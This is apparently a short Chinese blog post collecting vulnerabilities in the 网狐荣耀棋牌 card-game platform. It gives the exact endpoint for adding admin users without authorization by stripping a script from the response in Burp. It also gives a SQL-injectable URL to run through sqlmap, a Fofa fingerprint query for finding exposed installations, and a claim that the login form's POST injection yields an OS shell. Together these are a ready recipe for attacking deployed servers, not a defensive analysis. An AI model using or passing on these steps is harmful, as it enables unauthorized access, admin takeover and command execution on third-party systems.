网狐荣耀棋牌漏洞合集
未授权添加管理用户
这套程序挺多未授权访问的(可以说是逻辑漏洞)
漏洞地址
/Module/BackManager/BaseUserInfo.aspx?cmd=add
使用Burp直接抓包拦截response返回包 删除如下代码
1 | <script type="text/javascript"> |
go 一路放包
前台Sql注入
漏洞地址
Module/ConvertManager/dhcontrol.php?did=1¶m=1234&money=1200.00&status=1&fkorderid=
直接sqlmap 一把唆
更新另一版本
Fofa 关键词:body="/Content/images/login_title_bg.png"
登录地址存在 Post 注入 直接OSshell
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Caps!
评论